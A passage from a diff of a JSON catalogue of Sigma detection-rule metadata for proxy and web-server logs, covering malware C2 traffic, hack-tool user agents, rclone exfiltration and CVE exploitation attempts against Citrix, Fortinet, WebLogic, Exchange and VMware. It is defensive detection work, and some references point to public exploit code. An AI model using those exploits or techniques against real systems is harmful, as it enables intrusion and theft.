developer that shared and copied code snippets and used the raw link instead of just copy & paste)" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects a flashplayer update from an unofficial location", + "uuid": "4922a5dd-6743-4fc2-8e81-144374280997", + "value": "Flash Player Update from Suspicious Location", + "meta": { + "refs": [ + "https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_susp_flash_download_loc.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1189", + "attack.execution", + "attack.t1204.002", + "attack.defense_evasion", + "attack.t1036.005" + ], + "creation_date": "2017/10/25", + "filename": "proxy_susp_flash_download_loc.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown flash download locations" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious requests to Telegram API without the usual Telegram User-Agent", + "uuid": "b494b165-6634-483d-8c47-2026a6c52372", + "value": "Telegram API Access", + "meta": { + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", + "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", + "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_telegram_api.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001", + "attack.t1102.002" + ], + "creation_date": "2018/06/05", + "filename": "proxy_telegram_api.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate use of Telegram bots in the 
company" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Turla ComRAT patterns", + "uuid": "7857f021-007f-4928-8b2c-7aedbe64bb82", + "value": "Turla ComRAT", + "meta": { + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_turla_comrat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001", + "attack.g0010" + ], + "creation_date": "2020/05/26", + "filename": "proxy_turla_comrat.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious user agent strings used in APT malware in proxy logs", + "uuid": "6ec820f2-e963-4801-9127-d8b2dce4d31b", + "value": "APT User Agent", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_apt.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2019/11/12", + "filename": "proxy_ua_apt.yml", + "author": "Florian Roth, Markus Neis", + "level": "high", + "falsepositive": [ + "Old browsers" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Bitsadmin connections to IP addresses instead of FQDN names", + "uuid": "8ccd35a2-1c7c-468b-b568-ac6cdf80eec3", + "value": "Bitsadmin to Uncommon IP Server Address", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_ip.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190" + ], + "creation_date": "2022/06/10", + "filename": "proxy_ua_bitsadmin_susp_ip.yml", + "author": 
"Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Bitsadmin connections to domains with uncommon TLDs", + "uuid": "9eb68894-7476-4cd6-8752-23b51f5883a7", + "value": "Bitsadmin to Uncommon TLD", + "meta": { + "refs": [ + "https://twitter.com/jhencinski/status/1102695118455349248", + "https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190" + ], + "creation_date": "2019/03/07", + "filename": "proxy_ua_bitsadmin_susp_tld.yml", + "author": "Florian Roth, Tim Shelton", + "level": "high", + "falsepositive": [ + "Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious user agent strings used by crypto miners in proxy logs", + "uuid": "fa935401-513b-467b-81f4-f9e77aa0dd78", + "value": "Crypto Miner User Agent", + "meta": { + "refs": [ + "https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65", + "https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_cryptominer.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2019/10/21", + "filename": "proxy_ua_cryptominer.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious user agent 
strings used by exploit / pentest frameworks like Metasploit in proxy logs", + "uuid": "fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f", + "value": "Exploit Framework User Agent", + "meta": { + "refs": [ + "https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_frameworks.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2017/07/08", + "filename": "proxy_ua_frameworks.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious user agent strings user by hack tools in proxy logs", + "uuid": "c42a3073-30fb-48ae-8c99-c23ada84b103", + "value": "Hack Tool User Agent", + "meta": { + "refs": [ + "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", + "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_hacktool.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.credential_access", + "attack.t1110" + ], + "creation_date": "2017/07/08", + "filename": "proxy_ua_hacktool.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious user agent strings used by malware in proxy logs", + "uuid": "5c84856b-55a5-45f1-826f-13f37250cf4e", + "value": "Malware User Agent", + "meta": { + "refs": [ + "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", + "http://www.botopedia.org/search?searchword=scan&searchphrase=all", + "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", + 
"https://perishablepress.com/blacklist/ua-2013.txt", + "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_malware.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2017/07/08", + "filename": "proxy_ua_malware.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string", + "uuid": "2c03648b-e081-41a5-b9fb-7d854a915091", + "value": "Rclone Activity via Proxy", + "meta": { + "refs": [ + "https://rclone.org/", + "https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_rclone.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ], + "creation_date": "2022/10/18", + "filename": "proxy_ua_rclone.yml", + "author": "Janantha Marasinghe", + "level": "medium", + "falsepositive": [ + "Valid requests with this exact user agent to that is used by legitimate scripts or sysadmin operations" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious malformed user agent strings in proxy logs", + "uuid": "7195a772-4b3f-43a4-a210-6a003d65caa1", + "value": "Suspicious User Agent", + "meta": { + "refs": [ + "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_susp.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2017/07/08", + "filename": "proxy_ua_susp.yml", + "author": 
"Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious User Agent strings that end with an equal sign, which can be a sign of base64 encoded values used as User Agent string", + "uuid": "894a8613-cf12-48b3-8e57-9085f54aa0c3", + "value": "Suspicious Base64 User Agent", + "meta": { + "refs": [ + "https://blogs.jpcert.or.jp/en/2022/07/yamabot.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_susp_base64.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2022/07/08", + "filename": "proxy_ua_susp_base64.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects Ursnif C2 traffic.", + "uuid": "932ac737-33ca-4afd-9869-0d48b391fcc9", + "value": "Ursnif Malware C2 URL Pattern", + "meta": { + "refs": [ + "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ursnif_malware_c2_url.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1204.002", + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2019/12/19", + "filename": "proxy_ursnif_malware_c2_url.yml", + "author": "Thomas Patzke", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects download of Ursnif malware done by dropper documents.", + "uuid": "a36ce77e-30db-4ea0-8795-644d7af5dfb4", + "value": "Ursnif Malware Download URL Pattern", + "meta": { + "refs": [ + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ursnif_malware_download_url.yml" + ], + "tags": "No established tags", + "creation_date": "2019/12/19", + "filename": "proxy_ursnif_malware_download_url.yml", + "author": "Thomas Patzke", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "proxy", + "logsource.product": "No established product" + } + }, + { + "description": "Detects a segmentation fault error message caused by a creashing apache worker process", + "uuid": "1da8ce0b-855d-4004-8860-7d64d42063b1", + "value": "Apache Segmentation Fault", + "meta": { + "refs": [ + "http://www.securityfocus.com/infocus/1633", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_segfault.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499.004" + ], + "creation_date": "2017/02/28", + "filename": "web_apache_segfault.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "No established product" + } + }, + { + "description": "Detects an issue in apache logs that reports threading related errors", + "uuid": "e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c", + "value": "Apache Threading Error", + "meta": { + "refs": [ + "https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_threading_error.yml" + ], + "tags": "No established tags", + "creation_date": "2019/01/22", + "filename": "web_apache_threading_error.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185" + ], + "logsource.category": "No established category", + "logsource.product": "No established product" + } + }, + { + "description": "MODx manager - Local File Inclusion:Directory traversal vulnerability in 
manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier,\nwhen magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.\n", + "uuid": "a4a899e8-fd7a-49dd-b5a8-7044def72d61", + "value": "CVE-2010-5278 Exploitation Attempt", + "meta": { + "refs": [ + "https://github.com/projectdiscovery/nuclei-templates", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2010_5278_exploitation_attempt.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/08/25", + "filename": "web_cve_2010_5278_exploitation_attempt.yml", + "author": "Subhash Popuri (@pbssubhash)", + "level": "critical", + "falsepositive": [ + "Scanning from Nuclei", + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287", + "uuid": "a133193c-2daa-4a29-8022-018695fcf0ae", + "value": "Rejetto HTTP File Server RCE", + "meta": { + "refs": [ + "https://vk9-sec.com/hfs-code-execution-cve-2014-6287/", + "https://www.exploit-db.com/exploits/39161", + "https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2014_6287_hfs_rce.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.t1505.003", + "cve.2014.6287" + ], + "creation_date": "2022/07/19", + "filename": "web_cve_2014_6287_hfs_rce.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs", + "uuid": "a2e97350-4285-43f2-a63f-d0daff291738", + 
"value": "Fortinet CVE-2018-13379 Exploitation", + "meta": { + "refs": [ + "https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_13379_fortinet_preauth_read_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2020/12/08", + "filename": "web_cve_2018_13379_fortinet_preauth_read_exploit.yml", + "author": "Bhabesh Raj", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects access to a webshell dropped into a keystore folder on the WebLogic server", + "uuid": "37e8369b-43bb-4bf8-83b6-6dd43bda2000", + "value": "Oracle WebLogic Exploit", + "meta": { + "refs": [ + "https://twitter.com/pyn3rd/status/1020620932967223296", + "https://github.com/LandGrey/CVE-2018-2894", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_2894_weblogic_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.t1505.003", + "cve.2018.2894" + ], + "creation_date": "2018/07/22", + "filename": "web_cve_2018_2894_weblogic_exploit.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole", + "uuid": "2dbc10d7-a797-49a8-8776-49efa6442e60", + "value": "Pulse Secure Attack CVE-2019-11510", + "meta": { + "refs": [ + "https://www.exploit-db.com/exploits/47297", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_11510_pulsesecure_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2019/11/18", + "filename": "web_cve_2019_11510_pulsesecure_exploit.yml", + "author": 
"Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack", + "uuid": "ac5a6409-8c89-44c2-8d64-668c29a2d756", + "value": "Citrix Netscaler Attack CVE-2019-19781", + "meta": { + "refs": [ + "https://support.citrix.com/article/CTX267679", + "https://support.citrix.com/article/CTX267027", + "https://isc.sans.edu/diary/25686", + "https://twitter.com/mpgn_x64/status/1216787131210829826", + "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_19781_citrix_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2020/01/02", + "filename": "web_cve_2019_19781_citrix_exploit.yml", + "author": "Arnim Rupp, Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398", + "uuid": "e9bc39ae-978a-4e49-91ab-5bd481fc668b", + "value": "Confluence Exploitation CVE-2019-3398", + "meta": { + "refs": [ + "https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_3398_confluence.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2020/05/26", + "filename": "web_cve_2019_3398_confluence.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + 
"description": "Detects CVE-2020-0688 Exploitation attempts", + "uuid": "7c64e577-d72e-4c3d-9d75-8de6d1f9146a", + "value": "CVE-2020-0688 Exploitation Attempt", + "meta": { + "refs": [ + "https://github.com/Ridter/cve-2020-0688", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_0688_exchange_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2020/02/27", + "filename": "web_cve_2020_0688_exchange_exploit.yml", + "author": "NVISO", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688", + "uuid": "fce2c2e2-0fb5-41ab-a14c-5391e1fd70a5", + "value": "CVE-2020-0688 Exchange Exploitation via Web Log", + "meta": { + "refs": [ + "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_0688_msexchange.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2020/02/29", + "filename": "web_cve_2020_0688_msexchange.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts", + "uuid": "5a35116f-43bc-4901-b62d-ef131f42a9af", + "value": "CVE-2020-10148 SolarWinds Orion API Auth Bypass", + "meta": { + "refs": [ + "https://kb.cert.org/vuls/id/843464", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_10148_solarwinds_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2020/12/27", + "filename": "web_cve_2020_10148_solarwinds_exploit.yml", + 
"author": "Bhabesh Raj, Tim Shelton", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation attempts on WebLogic servers", + "uuid": "85d466b0-d74c-4514-84d3-2bdd3327588b", + "value": "Oracle WebLogic Exploit CVE-2020-14882", + "meta": { + "refs": [ + "https://isc.sans.edu/diary/26734", + "https://twitter.com/jas502n/status/1321416053050667009?s=20", + "https://twitter.com/sudo_sudoka/status/1323951871078223874", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_14882_weblogic_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2020.14882" + ], + "creation_date": "2020/11/02", + "filename": "web_cve_2020_14882_weblogic_exploit.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188", + "uuid": "15c312b9-00d0-4feb-8870-7d940a4bdc5e", + "value": "TerraMaster TOS CVE-2020-28188", + "meta": { + "refs": [ + "https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/", + "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_28188_terramaster_rce_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2020.28188" + ], + "creation_date": "2021/01/25", + "filename": "web_cve_2020_28188_terramaster_rce_exploit.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation attempts on Cisco ASA FTD systems exploiting 
CVE-2020-3452 with a status code of 200 (sccessful exploitation)", + "uuid": "aba47adc-4847-4970-95c1-61dce62a8b29", + "value": "Cisco ASA FTD Exploit CVE-2020-3452", + "meta": { + "refs": [ + "https://twitter.com/aboul3la/status/1286012324722155525", + "https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2020.3452" + ], + "creation_date": "2021/01/07", + "filename": "web_cve_2020_3452_cisco_asa_ftd.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902", + "uuid": "44b53b1c-e60f-4a7b-948e-3435a7918478", + "value": "CVE-2020-5902 F5 BIG-IP Exploitation Attempt", + "meta": { + "refs": [ + "https://support.f5.com/csp/article/K52145254", + "https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/", + "https://twitter.com/yorickkoster/status/1279709009151434754", + "https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_5902_f5_bigip.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2020/07/05", + "filename": "web_cve_2020_5902_f5_bigip.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and 
CVE-2020-8195", + "uuid": "0d0d9a8a-a49e-4e27-b061-7ce4b936cfb7", + "value": "Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195", + "meta": { + "refs": [ + "https://support.citrix.com/article/CTX276688", + "https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/", + "https://dmaasland.github.io/posts/citrix.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_8193_8195_citrix_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2020/07/10", + "filename": "web_cve_2020_8193_8195_citrix_exploit.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.", + "uuid": "f0500377-bc70-425d-ac8c-e956cd906871", + "value": "Arcadyan Router Exploitations", + "meta": { + "refs": [ + "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2", + "https://www.tenable.com/security/research/tra-2021-13", + "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2021.20090", + "cve.2021.20091" + ], + "creation_date": "2021/08/24", + "filename": "web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml", + "author": "Bhabesh Raj", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the exploitation of the WebLogic server 
vulnerability described in CVE-2021-2109", + "uuid": "687f6504-7f44-4549-91fc-f07bab065821", + "value": "Oracle WebLogic Exploit CVE-2021-2109", + "meta": { + "refs": [ + "https://twitter.com/pyn3rd/status/1351696768065409026", + "https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2021.2109" + ], + "creation_date": "2021/01/20", + "filename": "web_cve_2021_2109_weblogic_rce_exploit.yml", + "author": "Bhabesh Raj", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972", + "uuid": "179ed852-0f9b-4009-93a7-68475910fd86", + "value": "CVE-2021-21972 VSphere Exploitation", + "meta": { + "refs": [ + "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", + "https://f5.pm/go-59627.html", + "https://swarm.ptsecurity.com/unauth-rce-vmware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/02/24", + "filename": "web_cve_2021_21972_vsphere_unauth_rce_exploit.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "OVA uploads to your VSphere appliance" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978", + "uuid": "77586a7f-7ea4-4c41-b19c-820140b84ca9", + "value": "CVE-2021-21978 Exploitation Attempt", + "meta": { + "refs": [ + "https://twitter.com/wugeej/status/1369476795255320580", + "https://paper.seebug.org/1495/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2021.21978" + ], + "creation_date": "2020/03/10", + "filename": "web_cve_2021_21978_vmware_view_planner_exploit.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.", + "uuid": "b014ea07-8ea0-4859-b517-50a4e5b7ecec", + "value": "VMware vCenter Server File Upload CVE-2021-22005", + "meta": { + "refs": [ + "https://kb.vmware.com/s/article/85717", + "https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22005_vmware_file_upload.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/09/24", + "filename": "web_cve_2021_22005_vmware_file_upload.yml", + "author": "Sittikorn S", + "level": "high", + "falsepositive": [ + "Vulnerability Scanning" + ], + "logsource.category": "webserver", + "logsource.product": "No established product" + } + }, + { + "description": "Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs", + "uuid": "f425637f-891c-4191-a6c4-3bb1b70513b4", + "value": "Fortinet CVE-2021-22123 Exploitation", + "meta": { + "refs": [ + "https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22123_fortinet_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/08/19", + "filename": "web_cve_2021_22123_fortinet_exploit.yml", + "author": "Bhabesh Raj, Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" 
